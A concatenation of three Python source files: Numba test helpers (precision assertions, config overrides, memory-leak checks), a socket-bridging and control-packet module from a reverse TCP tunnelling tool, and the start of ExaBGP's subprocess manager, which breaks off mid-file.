return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
|
common_func.py | #!/usr/bin/env python
# coding=utf-8
from __future__ import print_function, unicode_literals, division, absolute_import
import sys
import time
import binascii
import struct
import collections
import logging
import socket
import select
import threading
import traceback
import functools
try:
# for pycharm type hinting
from typing import Union, Callable
except:
pass
# socket recv buffer, 16384 bytes
RECV_BUFFER_SIZE = 2 ** 14
# default secretkey, use -k/--secretkey to change
SECRET_KEY = "0"
# how long a SPARE slaver would keep
# once slaver received an heart-beat package from master,
# the TTL would be reset. And heart-beat delay is less than TTL,
# so, theoretically, spare slaver never timeout,
# except network failure
# notice: working slaver would NEVER timeout
SPARE_SLAVER_TTL = 300
# internal program version, appears in CtrlPkg
INTERNAL_VERSION = 0x000D
# version for human readable
__version__ = (2, 2, 8, INTERNAL_VERSION)
# just a logger
log = logging.getLogger(__name__)
def version_info():
"""get program version for human. eg: "2.1.0-r2" """
return "{}.{}.{}-r{}".format(*__version__)
def configure_logging(level):
logging.basicConfig(
level=level,
format='[%(levelname)s %(asctime)s] %(message)s',
)
def fmt_addr(socket):
"""(host, int(port)) --> "host:port" """
return "{}:{}".format(*socket)
def split_host(x):
""" "host:port" --> (host, int(port))"""
try:
host, port = x.split(":")
port = int(port)
except:
raise ValueError(
"wrong syntax, format host:port is "
"required, not {}".format(x))
else:
return host, port
def try_close(closable):
"""try close something
same as
try:
connection.close()
except:
pass
"""
try:
closable.close()
except:
pass
def select_recv(conn, buff_size, timeout=None):
"""add timeout for socket.recv()
:type conn: socket.SocketType
:type buff_size: int
:type timeout: float
:rtype: Union[bytes, None]
"""
rlist, _, _ = select.select([conn], [], [], timeout)
if not rlist:
# timeout
raise RuntimeError("recv timeout")
buff = conn.recv(buff_size)
if not buff:
raise RuntimeError("received zero bytes, socket was closed")
return buff
class SocketBridge:
"""
transfer data between sockets
"""
def __init__(self):
self.conn_rd = set() # record readable-sockets
self.map = {} # record sockets pairs
self.callbacks = {} # record callbacks
def add_conn_pair(self, conn1, conn2, callback=None):
"""
transfer anything between two sockets
:type conn1: socket.SocketType
:type conn2: socket.SocketType
:param callback: callback in connection finish
:type callback: Callable
"""
# mark as readable
self.conn_rd.add(conn1)
self.conn_rd.add(conn2)
# record sockets pairs
self.map[conn1] = conn2
self.map[conn2] = conn1
# record callback
if callback is not None:
self.callbacks[conn1] = callback
def start_as_daemon(self):
t = threading.Thread(target=self.start)
t.daemon = True
t.start()
log.info("SocketBridge daemon started")
return t
def start(self):
while True:
try:
self._start()
except:
log.error("FATAL ERROR! SocketBridge failed {}".format(
traceback.format_exc()
))
def _start(self):
# memoryview act as an recv buffer
# refer https://docs.python.org/3/library/stdtypes.html#memoryview
buff = memoryview(bytearray(RECV_BUFFER_SIZE))
while True:
if not self.conn_rd:
# sleep if there is no connections
time.sleep(0.06)
continue
# blocks until there is socket(s) ready for .recv
# notice: sockets which were closed by remote,
# are also regarded as read-ready by select()
r, w, e = select.select(self.conn_rd, [], [], 0.5)
for s in r: # iter every read-ready or closed sockets
try:
# here, we use .recv_into() instead of .recv()
# recv data directly into the pre-allocated buffer
# to avoid many unnecessary malloc()
# see https://docs.python.org/3/library/socket.html#socket.socket.recv_into
rec_len = s.recv_into(buff, RECV_BUFFER_SIZE)
except:
# unable to read, in most cases, it's due to socket close
self._rd_shutdown(s)
continue
if not rec_len:
# read zero size, closed or shutdowned socket
self._rd_shutdown(s)
continue
try:
# send data, we use `buff[:rec_len]` slice because
# only the front of buff is filled
self.map[s].send(buff[:rec_len])
except:
# unable to send, close connection
self._rd_shutdown(s)
continue
def _rd_shutdown(self, conn, once=False):
"""action when connection should be read-shutdown
:type conn: socket.SocketType
"""
if conn in self.conn_rd:
self.conn_rd.remove(conn)
try:
conn.shutdown(socket.SHUT_RD)
except:
pass
if not once and conn in self.map: # use the `once` param to avoid infinite loop
# if a socket is rd_shutdowned, then it's
# pair should be wr_shutdown.
self._wr_shutdown(self.map[conn], True)
if self.map.get(conn) not in self.conn_rd:
# if both two connection pair was rd-shutdowned,
# this pair sockets are regarded to be completed
# so we gonna close them
self._tterminate(conn)
def _wr_shutdown(self, conn, once=False):
"""action when connection should be write-shutdown
:type conn: socket.SocketType
"""
try:
conn.shutdown(socket.SHUT_WR)
except:
pass
if not once and conn in self.map: # use the `once` param to avoid infinite loop
# pair should be rd_shutdown.
# if a socket is wr_shutdowned, then it's
self._rd_shutdown(self.map[conn], True)
def _tterminate(self, conn):
"""terminate a sockets pair (two socket)
:type conn: socket.SocketType
:param conn: any one of the sockets pair
"""
try_close(conn) # close the first socket
# ------ close and clean the mapped socket, if exist ------
if conn in self.map:
_mapped_conn = self.map[conn]
try_close(_mapped_conn)
if _mapped_conn in self.map:
del self.map[_mapped_conn]
del self.map[conn] # clean the first socket
else:
_mapped_conn = None # just a fallback
# ------ callback --------
# because we are not sure which socket are assigned to callback,
# so we should try both
if conn in self.callbacks:
try:
self.callbacks[conn]()
except Exception as e:
log.error("traceback error: {}".format(e))
log.debug(traceback.format_exc())
del self.callbacks[conn]
elif _mapped_conn and _mapped_conn in self.callbacks:
try:
self.callbacks[_mapped_conn]()
except Exception as e:
log.error("traceback error: {}".format(e))
log.debug(traceback.format_exc())
del self.callbacks[_mapped_conn]
class CtrlPkg:
"""
Control Packages of shootback, not completed yet
current we have: handshake and heartbeat
NOTICE: If you are non-Chinese reader,
please contact me for the following Chinese comment's translation
http://github.com/aploium
控制包结构 总长64bytes CtrlPkg.FORMAT_PKG
使用 big-endian
体积 名称 数据类型 描述
1 pkg_ver unsigned char 包版本 *1
1 pkg_type signed char 包类型 *2
2 prgm_ver unsigned short 程序版本 *3
20 N/A N/A 预留
40 data bytes 数据区 *4
*1: 包版本. 包整体结构的定义版本, 目前只有 0x01
*2: 包类型. 除心跳外, 所有负数包代表由Slaver发出, 正数包由Master发出
-1: Slaver-->Master 的握手响应包 PTYPE_HS_S2M
0: 心跳包 PTYPE_HEART_BEAT
+1: Master-->Slaver 的握手包 PTYPE_HS_M2S
*3: 默认即为 INTERNAL_VERSION
*4: 数据区中的内容由各个类型的包自身定义
-------------- 数据区定义 ------------------
包类型: -1 (Slaver-->Master 的握手响应包)
体积 名称 数据类型 描述
4 crc32_s2m unsigned int 简单鉴权用 CRC32(Reversed(SECRET_KEY))
其余为空
*注意: -1握手包是把 SECRET_KEY 字符串翻转后取CRC32, +1握手包不预先反转
包类型: 0 (心跳)
数据区为空
包理性: +1 (Master-->Slaver 的握手包)
体积 名称 数据类型 描述
4 crc32_m2s unsigned int 简单鉴权用 CRC32(SECRET_KEY)
其余为空
"""
PACKAGE_SIZE = 2 ** 6 # 64 bytes
CTRL_PKG_TIMEOUT = 5 # CtrlPkg recv timeout, in second
# CRC32 for SECRET_KEY and Reversed(SECRET_KEY)
SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
# Package Type
PTYPE_HS_S2M = -1 # handshake pkg, slaver to master
PTYPE_HEART_BEAT = 0 # heart beat pkg
PTYPE_HS_M2S = +1 # handshake pkg, Master to Slaver
TYPE_NAME_MAP = {
PTYPE_HS_S2M: "PTYPE_HS_S2M",
PTYPE_HEART_BEAT: "PTYPE_HEART_BEAT",
PTYPE_HS_M2S: "PTYPE_HS_M2S",
}
# formats
# see https://docs.python.org/3/library/struct.html#format-characters
# for format syntax
FORMAT_PKG = "!b b H 20x 40s"
FORMATS_DATA = {
PTYPE_HS_S2M: "!I 36x",
PTYPE_HEART_BEAT: "!40x",
PTYPE_HS_M2S: "!I 36x",
}
_cache_prebuilt_pkg = {} # cache
def __init__(self, pkg_ver=0x01, pkg_type=0,
prgm_ver=INTERNAL_VERSION, data=(),
raw=None,
):
"""do not call this directly, use `CtrlPkg.pbuild_*` instead"""
self.pkg_ver = pkg_ver
self.pkg_type = pkg_type
self.prgm_ver = prgm_ver
self.data = data
if raw:
self.raw = raw
else:
self._build_bytes()
@property
def type_name(self):
"""返回人类可读的包类型"""
return self.TYPE_NAME_MAP.get(self.pkg_type, "TypeUnknown")
def __str__(self):
return """pkg_ver: {} pkg_type:{} prgm_ver:{} data:{}""".format(
self.pkg_ver,
self.type_name,
self.prgm_ver,
self.data,
)
def __repr__(self):
return self.__str__()
def _build_bytes(self):
self.raw = struct.pack(
self.FORMAT_PKG,
self.pkg_ver,
self.pkg_type,
self.prgm_ver,
self.data_encode(self.pkg_type, self.data),
)
@classmethod
def _prebuilt_pkg(cls, pkg_type, fallback):
"""act as lru_cache"""
if pkg_type not in cls._cache_prebuilt_pkg:
pkg = fallback(force_rebuilt=True)
cls._cache_prebuilt_pkg[pkg_type] = pkg
return cls._cache_prebuilt_pkg[pkg_type]
@classmethod
def recalc_crc32(cls):
cls.SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
cls.SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
#logging.info("main key:{},{}".format(cls.SECRET_KEY_CRC32, cls.SECRET_KEY_REVERSED_CRC32))
@classmethod
def data_decode(cls, ptype, data_raw):
return struct.unpack(cls.FORMATS_DATA[ptype], data_raw)
@classmethod
def data_encode(cls, ptype, data):
return struct.pack(cls.FORMATS_DATA[ptype], *data)
def verify(self, pkg_type=None):
try:
if pkg_type is not None and self.pkg_type != pkg_type:
return False
elif self.pkg_type == self.PTYPE_HS_S2M:
# Slaver-->Master 的握手响应包
return self.data[0] == self.SECRET_KEY_REVERSED_CRC32
elif self.pkg_type == self.PTYPE_HEART_BEAT:
# 心跳
return True
elif self.pkg_type == self.PTYPE_HS_M2S:
# Master-->Slaver 的握手包
return self.data[0] == self.SECRET_KEY_CRC32
else:
return True
except:
return False
@classmethod
def decode_only(cls, raw):
"""
decode raw bytes to CtrlPkg instance, no verify
use .decode_verify() if you also want verify
:param raw: raw bytes content of package
:type raw: bytes
:rtype: CtrlPkg
"""
if not raw or len(raw) != cls.PACKAGE_SIZE:
raise ValueError("content size should be {}, but {}".format(
cls.PACKAGE_SIZE, len(raw)
))
pkg_ver, pkg_type, prgm_ver, data_raw = struct.unpack(cls.FORMAT_PKG, raw)
logging.info("CtrlPkg,decode_only,,,,pkg_ver:{}, pkg_type:{}, prgm_ver:{}".format(pkg_ver, pkg_type,prgm_ver))
data = cls.data_decode(pkg_type, data_raw)
return cls(
pkg_ver=pkg_ver, pkg_type=pkg_type,
prgm_ver=prgm_ver,
data=data,
raw=raw,
)
@classmethod
def decode_verify(cls, raw, pkg_type=None):
"""decode and verify a package
:param raw: raw bytes content of package
:type raw: bytes
:param pkg_type: assert this package's type,
if type not match, would be marked as wrong
:type pkg_type: int
:rtype: CtrlPkg, bool
:return: tuple(CtrlPkg, is_it_a_valid_package)
"""
try:
pkg = cls.decode_only(raw)
except:
return None, False
else:
return pkg, pkg.verify(pkg_type=pkg_type)
@classmethod
def pbuild_hs_m2s(cls, force_rebuilt=False):
"""pkg build: Handshake Master to Slaver"""
# because py27 do not have functools.lru_cache, so we must write our own
if force_rebuilt:
return cls(
pkg_type=cls.PTYPE_HS_M2S,
data=(cls.SECRET_KEY_CRC32,),
)
else:
return cls._prebuilt_pkg(cls.PTYPE_HS_M2S, cls.pbuild_hs_m2s)
@classmethod
def pbuild_hs_s2m(cls, force_rebuilt=False):
"""pkg build: Handshake Slaver to Master"""
if force_rebuilt:
return cls(
pkg_type=cls.PTYPE_HS_S2M,
data=(cls.SECRET_KEY_REVERSED_CRC32,),
)
else:
return cls._prebuilt_pkg(cls.PTYPE_HS_S2M, cls.pbuild_hs_s2m)
@classmethod
def pbuild_heart_beat(cls, force_rebuilt=False):
"""pkg build: Heart Beat Package"""
if force_rebuilt:
return cls(
pkg_type=cls.PTYPE_HEART_BEAT,
)
else:
return cls._prebuilt_pkg(cls.PTYPE_HEART_BEAT, cls.pbuild_heart_beat)
@classmethod
def recv(cls, sock, timeout=CTRL_PKG_TIMEOUT, expect_ptype=None):
"""just a shortcut function
:param sock: which socket to recv CtrlPkg from
:type sock: socket.SocketType
:rtype: CtrlPkg,bool
"""
logging.info("CtrlPkg,recv,sock:{},expect_ptype:{}".format(sock, expect_ptype))
buff = select_recv(sock, cls.PACKAGE_SIZE, timeout)
pkg, verify = CtrlPkg.decode_verify(buff, pkg_type=expect_ptype) # type: CtrlPkg,bool
return pkg, verify
|
processes.py | """
process.py
Created by Thomas Mangin on 2011-05-02.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
import os
import errno
import time
import subprocess
import select
import fcntl
from exabgp.util import str_ascii
from exabgp.util import bytes_ascii
from exabgp.util.errstr import errstr
from exabgp.reactor.network.error import error
from exabgp.configuration.core.format import formated
from exabgp.reactor.api.response import Response
from exabgp.reactor.api.response.answer import Answer
from exabgp.bgp.message import Message
from exabgp.logger import Logger
from exabgp.version import json as json_version
from exabgp.version import text as text_version
from exabgp.configuration.environment import environment
from threading import Thread
# pylint: disable=no-self-argument,not-callable,unused-argument,invalid-name
class ProcessError(Exception):
pass
def preexec_helper():
# make this process a new process group
# os.setsid()
# This prevent the signal to be sent to the children (and create a new process group)
os.setpgrp()
# signal.signal(signal.SIGINT, signal.SIG_IGN)
class Processes(object):
# how many time can a process can respawn in the time interval
respawn_timemask = 0xFFFFFF - 0b111111
# '0b111111111111111111000000' (around a minute, 63 seconds)
_dispatch = {}
def __init__(self):
self.logger = Logger()
self.clean()
self.silence = False
self._buffer = {}
self._configuration = {}
self._restart = {}
self.respawn_number = 5 if environment.settings().api.respawn else 0
self.terminate_on_error = environment.settings().api.terminate
self.ack = environment.settings().api.ack
def number(self):
return len(self._process)
def clean(self):
self.fds = []
self._process = {}
self._encoder = {}
self._broken = []
self._respawning = {}
def _handle_problem(self, process):
if process not in self._process:
return
if self.respawn_number and self._restart[process]:
self.logger.debug('process %s ended, restarting it' % process, 'process')
self._terminate(process)
self._start(process)
else:
self.logger.debug('process %s ended' % process, 'process')
self._terminate(process)
def _terminate(self, process_name):
self.logger.debug('terminating process %s' % process_name, 'process')
process = self._process[process_name]
del self._process[process_name]
self._update_fds()
thread = Thread(target=self._terminate_run, args=(process,))
thread.start()
return thread
def _terminate_run(self, process):
try:
process.terminate()
process.wait()
except (OSError, KeyError):
# the process is most likely already dead
pass
def terminate(self):
for process in list(self._process):
if not self.silence:
try:
self.write(process, self._encoder[process].shutdown())
except ProcessError:
pass
self.silence = True
# waiting a little to make sure IO is flushed to the pipes
# we are using unbuffered IO but still ..
time.sleep(0.1)
for process in list(self._process):
try:
t = self._terminate(process)
t.join()
except OSError:
# we most likely received a SIGTERM signal and our child is already dead
self.logger.debug('child process %s was already dead' % process, 'process')
self.clean()
def _start(self, process):
if not self._restart.get(process, True):
return
try:
if process in self._process:
self.logger.debug('process already running', 'process')
return
if process not in self._configuration:
self.logger.debug('can not start process, no configuration for it', 'process')
return
# Prevent some weird termcap data to be created at the start of the PIPE
# \x1b[?1034h (no-eol) (esc)
os.environ['TERM'] = 'dumb'
configuration = self._configuration[process]
run = configuration.get('run', '')
if run:
api = configuration.get('encoder', '')
self._encoder[process] = Response.Text(text_version) if api == 'text' else Response.JSON(json_version)
self._process[process] = subprocess.Popen(
run,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
preexec_fn=preexec_helper
# This flags exists for python 2.7.3 in the documentation but on on my MAC
# creationflags=subprocess.CREATE_NEW_PROCESS_GROUP
)
self._update_fds()
fcntl.fcntl(self._process[process].stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
self.logger.debug('forked process %s' % process, 'process')
self._restart[process] = self._configuration[process]['respawn']
around_now = int(time.time()) & self.respawn_timemask
if process in self._respawning:
if around_now in self._respawning[process]:
self._respawning[process][around_now] += 1
# we are respawning too fast
if self._respawning[process][around_now] > self.respawn_number:
self.logger.critical(
'Too many death for %s (%d) terminating program' % (process, self.respawn_number),
'process',
)
raise ProcessError()
else:
# reset long time since last respawn
self._respawning[process] = {around_now: 1}
else:
# record respawing
self._respawning[process] = {around_now: 1}
except (subprocess.CalledProcessError, OSError, ValueError) as exc:
self._broken.append(process)
self.logger.debug('could not start process %s' % process, 'process')
self.logger.debug('reason: %s' % str(exc), 'process')
def start(self, configuration, restart=False):
for process in list(self._process):
if process not in configuration:
self._terminate(process)
self._configuration = configuration
for process in configuration:
if restart and process in list(self._process):
self._terminate(process)
self._start(process)
def broken(self, neighbor):
if self._broken:
for process in self._configuration:
if process in self._broken:
return True
return False
def _update_fds(self):
